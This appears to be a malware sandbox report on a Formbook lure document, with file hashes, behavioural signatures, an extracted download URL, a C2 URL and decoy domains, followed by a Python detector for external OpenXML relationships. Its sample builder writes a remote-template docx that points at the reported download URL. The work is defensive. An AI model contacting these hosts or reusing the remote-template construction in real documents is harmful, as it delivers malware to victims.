General

Target: Swift Copy MT103.docx
Size: 10KB
Sample: 210621-r2p3xgneaa
MD5: 0af91d7b71322d26388ca7514ac04ec9
SHA1: 1589484b4e088060c6d98be0f0722b1073ed5519
SHA256: 4ff4f1d31926b86bc3d8bcdb13a445ec7637edd9f4ae48c153262a713c1f72b0
SHA512: f60f19dabde1702615224fa46f992aad77b5e8b3bb5c4a34c826a4bfc8b9f8ca4818820c3926a4094675487f2de842975b7211a649e07fca3ee56464839b79ba
Static task: static1

Behavioral task: behavioral1
  Sample: Swift Copy MT103.docx
  Resource: win7v20210410

Behavioral task: behavioral2
  Sample: Swift Copy MT103.docx
  Resource: win10v20210408
Malware Config

Extracted: URL
  https://win32indexdummy_username@itsssl.com/JmQEk
  (The text before "@" is URL userinfo, not a hostname; the host actually contacted is itsssl.com. Block or hunt on that host, not on the string as displayed.)

Extracted: formbook
  Version: 4.1
  C2: http://www.dragonpalcenk.com/k8n/
  Domains (Formbook configs carry a list of decoy domains alongside the live C2; the entries below are taken from the extracted config and are not each confirmed malicious infrastructure):
foxynailserie.com
thenoyzees.com
waterrising.xyz
allmister.com
theguyscave.com
erkitap.com
spyder-club.com
raskrutisam.com
giantledlights.com
wowbeautynails.com
youmovies.site
abjms.com
enso-solutions.com
seasonalcampgroundsmn.com
lukeprater.com
mufasacapital.com
idi360.com
mask-cleaner.com
aeruswilmde.com
venkatlifecoach.com
crochetandgabbana.com
onlineshreecollection.com
gwenythportillowightman.com
nexuspropertycare.com
progress.solutions
parkerut.com
achebones.com
jiazhengfu.com
chlamydiadeetz.com
thiele-concept.com
bayareataxattorney.com
geopainterdecorators.com
makemybuild.com
headsleepinstrument.online
finevinum.com
alphaworkoutgear.com
8765pk.com
rikonchat.com
gitchat.net
showy1.net
tellurideminer.com
triliumbrewing.com
fioriapartment.com
salubrigems.com
sctsmney.com
betgobar1.com
thomaspurcell.com
araket.com
parisfilmfestival.online
treepik.com
artemisnaturalhealing.com
littlehouseofhoarders.com
buyselllm.com
levnakava.com
mygolfbetter.com
vinlancer.com
beetalkmobile.press
gocampultralightmattress.com
direk99.net
nivxros.com
cbgdenver.com
datarock.net
docondemand.net
smithvilletexashistory.com
Targets

Target: Swift Copy MT103.docx (hashes as listed under General)
Signatures
  Formbook Payload
  Blocklisted process makes network request
  Downloads MZ/PE file
  Executes dropped EXE
  Abuses OpenXML format to download file from external location (the document package carries a relationship with TargetMode="External", so opening it triggers a fetch from a remote URL without any macro)
  Loads dropped DLL
  Uses the VBS compiler for execution (vbc.exe, the .NET Visual Basic compiler, started as a host process)
  Suspicious use of SetThreadContext (commonly used to redirect execution in a suspended process after a payload has been written into it, i.e. process hollowing or injection)
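The "Abuses OpenXML format to download file from external location" signature comes down to one structural fact about the document: some `*.rels` part inside the .docx zip declares a relationship with `TargetMode="External"`, so Word fetches the target on open with no macro involved. The script below is an added example, not part of the sandbox report or the sandbox's own detection logic. It builds a minimal docx in memory (constructed for the example, not the real sample), using the URL the report lists under Malware Config as the external template target, then scans every `.rels` part for external relationships and splits the target URL so the userinfo trick (`user@host`) is surfaced separately from the real host. The `attachedTemplate` relationship type and the `is_suspicious` heuristic are the example's own assumptions about what to flag.

```python
# Added example (not from the sandbox report): detect OpenXML relationships with
# TargetMode="External", the mechanism behind remote-template style downloads.
# The docx built here is constructed for the example; only the URL is from the report.
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
REPORTED_URL = "https://win32indexdummy_username@itsssl.com/JmQEk"  # from the report


def build_sample_docx(target: str, external: bool = True) -> bytes:
    """Build a minimal constructed docx in memory.

    external=True: word/_rels/settings.xml.rels declares an attachedTemplate
    relationship with TargetMode="External", so Word fetches `target` on open.
    external=False: the same relationship points at a part inside the package.
    """
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/attachedTemplate" '
        f'Target="{escape(target, {chr(34): "&quot;"})}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{WML_NS}"/>')
        z.writestr("word/settings.xml",
                   f'<w:settings xmlns:w="{WML_NS}" xmlns:r="{OFFICE_REL}">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def find_external_relationships(docx_bytes: bytes) -> list[dict]:
    """Return every relationship in any *.rels part whose TargetMode is External.

    Each hit records the .rels part, the short relationship type, the raw target,
    and the parsed scheme/host/userinfo. A target like https://user@host/path is a
    common way to make the link look like it points at "user" rather than "host".
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                parsed = urlsplit(target)
                hits.append({
                    "part": name,
                    "rel_type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "scheme": parsed.scheme,
                    "host": parsed.hostname or "",
                    "userinfo": parsed.username or "",
                })
    return hits


def is_suspicious(hit: dict) -> bool:
    """Heuristic (assumption): fetch-on-open over http(s), or a UNC path (NTLM leak)."""
    return hit["scheme"] in ("http", "https") or hit["target"].startswith("\\\\")


if __name__ == "__main__":
    for hit in find_external_relationships(build_sample_docx(REPORTED_URL)):
        print(("SUSPICIOUS " if is_suspicious(hit) else "ok ") + str(hit))
```

Run it against a real file by replacing `build_sample_docx(...)` with the bytes of the document; the scan covers every `.rels` part (`settings.xml.rels`, `document.xml.rels`, embedded OLE relationships), not only the attached-template one, so hyperlinks show up too and should be triaged by relationship type.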